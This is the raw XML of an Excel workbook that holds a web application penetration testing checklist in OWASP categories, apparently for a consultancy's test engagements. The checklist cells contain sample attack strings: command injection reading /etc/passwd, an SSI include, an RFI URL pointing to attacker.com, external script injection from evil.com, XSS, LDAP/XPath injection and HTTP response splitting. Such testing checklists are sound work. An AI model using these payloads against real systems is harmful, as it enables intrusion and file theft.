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ericsson-my.sharepoint.com/personal/vikramjeetsingh_kauldhar_ericsson_com/Documents/Documents/Work/Extra/PT test cases/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="46" documentId="13_ncr:1_{67E85616-BDBF-4DDE-BD9E-8E9A5032F35E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{F61AEDD6-B15A-4B2A-A7E1-642EC8DC0C1B}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" xr2:uid="{8ACF0999-DF02-4BE7-BF67-D42406DB46D6}"/>
  </bookViews>
  <sheets>
    <sheet name="Web Application Test case" sheetId="2" r:id="rId1"/>
    <sheet name="Basic" sheetId="3" r:id="rId2"/>
    <sheet name="intermidater" sheetId="4" r:id="rId3"/>
    <sheet name="Advance" sheetId="5"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="369" uniqueCount="298">
  <si>
    <t>Mandatory Scans/Email</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Questionnaire Preparation</t>
  </si>
  <si>
    <t xml:space="preserve">Fill out the questionaire with the gathered information from client. Inform the missing requirements immediately. </t>
  </si>
  <si>
    <t>Burp Suite Professional (Scanner)</t>
  </si>
  <si>
    <t>Scan the Web Application with Burp Suite Professional scanner. (Conduct Authenticated scan if Applicable.). Verify the presence of WAF by installing WAF detector burp plugin. Immediatly inform client to whitelist our IP addresses. </t>
  </si>
  <si>
    <t>OWASP ZAP</t>
  </si>
  <si>
    <t>Scan the Web Application with OWASP ZAP.</t>
  </si>
  <si>
    <t>Nexpose</t>
  </si>
  <si>
    <t xml:space="preserve"> ( common ports if not deployed in VPS). Otherwise web ports.</t>
  </si>
  <si>
    <t>Create User Story</t>
  </si>
  <si>
    <t>Dirb, DirBuster, GoBuster</t>
  </si>
  <si>
    <t>Fuzz the Web Application with Dirb/DirBuster/GoBuster for files/directories.</t>
  </si>
  <si>
    <t>Application Logs</t>
  </si>
  <si>
    <t>Send email to client asking for Application Logs (Use below template)
As part of Web Application assessment we have executed different kinds of automated tests today , we will continue with the manual validation of the same in coming days. We need a report from your SOC team on the different types of application attacks they have noticed today to fulfill the requirement of OWASP 2017 - A10( A10:2017-Insufficient Logging&amp;Monitoring). We need proof of all kinds of attacks performed either as raw logs of WAF/IPS/Proxy or as SIEM reports with the attacker details, in addition to this we will be collecting the application logs and will also be generating different error messages in application with fuzzing.
 In case your SOC is not able to get the details of the attack it will be reported as OWASP top 10 application vulnerability, this may invite compliance issues in external audits later. Thank you very much for your cooperation and support.</t>
  </si>
  <si>
    <t>Tool Vulnerability Report</t>
  </si>
  <si>
    <t>Prepare XL based on scan results. Format is in next excel sheet.</t>
  </si>
  <si>
    <t>Send all forms to SQLMap</t>
  </si>
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery (Public PT only)</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Google Hacking</t>
  </si>
  <si>
    <t>Shodan Check</t>
  </si>
  <si>
    <t xml:space="preserve">If the web application is publically available, Check for vulnerabilities in Shodan. </t>
  </si>
  <si>
    <t>https://www.shodan.io</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Check burp response header</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Analyze robots.txt.</t>
  </si>
  <si>
    <t>Check manually. Check hidden directories</t>
  </si>
  <si>
    <t>Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t>Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t>Verify source code manually</t>
  </si>
  <si>
    <t>Fingerprint Web Application</t>
  </si>
  <si>
    <t>Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t>Whatweb, CMSmap</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>Install WAFDetect Burp plugin</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Manual analysis + dirb, nikto, burp, robots.txt</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>Nexpose detects</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t xml:space="preserve">Identify HSTS header on Web server through HTTP response header. 
</t>
  </si>
  <si>
    <t>Burp Detects
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Test RIA cross domain policy</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Burp Detects automatically</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Identify manully with Burp Proxy</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>Identify manually with Burp Proxy. Check if same email can be used for different user resgistarations.</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t>Depends on the application (Manual analysis)</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Manual Analysis, BruteForce, Metasploit Modules</t>
  </si>
  <si>
    <t>Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t>Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t>Manual analysis. Verify guest account privileges</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t>Nexpose + Manual analysis</t>
  </si>
  <si>
    <t>Testing for default credentials</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.
http://web.archive.org/web/20150328012647/https:/www.whitehatsec.com/bAdmin/bAdmin.html
http://www.phenoelit.org/dpl/dpl.html
https://www.cirt.net/passwords</t>
  </si>
  <si>
    <t>Google search, Burp Proxy, Hydra, GHDB for product.</t>
  </si>
  <si>
    <t>Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking. Test Idle timeout &amp; user initiated timeout, Test for Deallocation of session data including session ID</t>
  </si>
  <si>
    <t>Bruteforce with 200 passwords. Final test case</t>
  </si>
  <si>
    <t>Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>Burp Proxy + Manual Analysis</t>
  </si>
  <si>
    <t>Test remember password functionality</t>
  </si>
  <si>
    <t>Look for passwords being stored in browser cache, web storage, cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?, Test whether passwords are stored in web storage.</t>
  </si>
  <si>
    <t>Login page. Check for remember me</t>
  </si>
  <si>
    <t>Testing for Browser cache weakness</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t xml:space="preserve">From a logged in page press logout and then press back button. </t>
  </si>
  <si>
    <t>Testing for Weak password policy</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.
https://www.openwall.com/wordlists/
https://github.com/danielmiessler/SecLists
https://wiki.skullsecurity.org/Passwords</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse manually. Using change password or registration </t>
  </si>
  <si>
    <t>Testing for Weak security question/answer</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>Manual Analysis</t>
  </si>
  <si>
    <t>Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?, Test password rset link (Check whether it has an expiry, Check whether it is linked with a session ID, See whether it is replicable, Check whether it s a recyclable link, Predictable Token with in link)</t>
  </si>
  <si>
    <t>Manual Analysis.</t>
  </si>
  <si>
    <t>Testing for Captcha</t>
  </si>
  <si>
    <t>Testing for weak captcha, Testing for possibility of replay attacks, Testing for automated captcha attacks.
http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html
https://boyter.org/decoding-captchas/
https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-008)
https://boingboing.net/2012/01/09/virtual-sweatshops-versus-capt.html
https://www.npr.org/templates/story/story.php?storyId=130594039?toryId=130594039
https://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/</t>
  </si>
  <si>
    <t>Testing for User Enumeration</t>
  </si>
  <si>
    <t>Test for valid user, Test for for nonexistent username
1. Cookies are deleted if user doesn't exist. Cookies are not deleted and or new cookies are set if user exist.
2. If user exists user goes to known specific  user  page, If user doesn't user goes to generic page that exist.
3. There is no change in HTML if the user does not exist, there is change in HTML if the user exists.
4. Time based analysis.
The response time will be different for user exists in DB and user does not exists in DB.
5. Burp comparer can be used for analyzing the difference in response.</t>
  </si>
  <si>
    <t>Burp proxy + Manual Analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Testing Directory traversal/file include</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t xml:space="preserve"> Wfuzz.
Use the below wordlist : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Traversal%20directory/directory_traversal.txt</t>
  </si>
  <si>
    <t>Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Try to access admin functionalities with low privilage user.</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse all cookies strength in burp sequencer </t>
  </si>
  <si>
    <t>Testing for Cookies attributes</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>Burp automated scan will detect this. Verify manually and take proxy.</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>Ensure that cookie is set after login.</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>Check if session tokens are passed in URL</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Check if csrf token is implemented. Burp genetrate CSRF POC.</t>
  </si>
  <si>
    <t>Testing for logout functionality</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>After logout, send old  request from burp history.</t>
  </si>
  <si>
    <t>Test Session Timeout</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>Owasp verify</t>
  </si>
  <si>
    <t>Testing for Session puzzling</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Session Timeout Test burp plugin</t>
  </si>
  <si>
    <t>Data Validation Testing</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t>Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t>netcat</t>
  </si>
  <si>
    <t>Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>SQL Injection - Oracle Testing</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>SQL Injection - MySQL Testing</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>SQL Injection - SQL Server Testing</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>SQL Injection - Testing PostgreSQL</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>SQL Injection - MS Access Testing</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>SQL Injection - Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Testing for ORM Injection</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t>Testing for Buffer overflow</t>
  </si>
  <si>
    <t>• Testing for heap overflow vulnerability
• Testing for stack overflow vulnerability
• Testing for format string vulnerability</t>
  </si>
  <si>
    <t>Immunity Canvas, Spike, MSF, Nessus</t>
  </si>
  <si>
    <t>Testing for incubated vulnerabilities</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Burp Proxy, BeEF, MSF</t>
  </si>
  <si>
    <t>Testing for HTTP Splitting/Smuggling</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, netcat</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Analysis of Error Codes</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>Analysis of Stack Traces</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t>testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</t>
  </si>
  <si>
    <t>Compare the responses in three different states:
• Cipher text gets decrypted, resulting data is correct.
• Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET</t>
  </si>
  <si>
    <t>Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t>•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>Test for Process Timing</t>
  </si>
  <si>
    <t>• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t>• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t>Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>Testing for Client Side Resource Manipulation</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>Test Web Messaging</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>Test Local Storage</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>jhoti</t>
  </si>
  <si>
    <t>me</t>
  </si>
  <si>
    <t>ravi</t>
  </si>
  <si>
    <t>TestCase</t>
  </si>
  <si>
    <t>Adhoc</t>
  </si>
  <si>
    <t>Basic</t>
  </si>
  <si>
    <t>Inmideate</t>
  </si>
  <si>
    <t>advance</t>
  </si>
  <si>
    <t>application that do not have any input fields</t>
  </si>
  <si>
    <t>Static web application</t>
  </si>
  <si>
    <t>Reporting showcase application</t>
  </si>
  <si>
    <t>Application that has only search option</t>
  </si>
  <si>
    <t>application having 1 business flow</t>
  </si>
  <si>
    <t>application having 10 page</t>
  </si>
  <si>
    <t>feeback</t>
  </si>
  <si>
    <t>gravence</t>
  </si>
  <si>
    <t>ticket generation page</t>
  </si>
  <si>
    <t>single page dyamnic with multip dymanic</t>
  </si>
  <si>
    <t>Bmc application</t>
  </si>
  <si>
    <t>compliex application</t>
  </si>
  <si>
    <t xml:space="preserve">two or more application interconnected </t>
  </si>
  <si>
    <t>completed</t>
  </si>
  <si>
    <t xml:space="preserve">evidence capture in word </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</si>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</sst>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0"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color theme="0" tint="-0.499984740745262"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="9"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="23"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="9">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="3" tint="0.79998168889431442"/>
        <bgColor indexed="6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4" tint="0.79998168889431442"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="-0.249977111117893"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
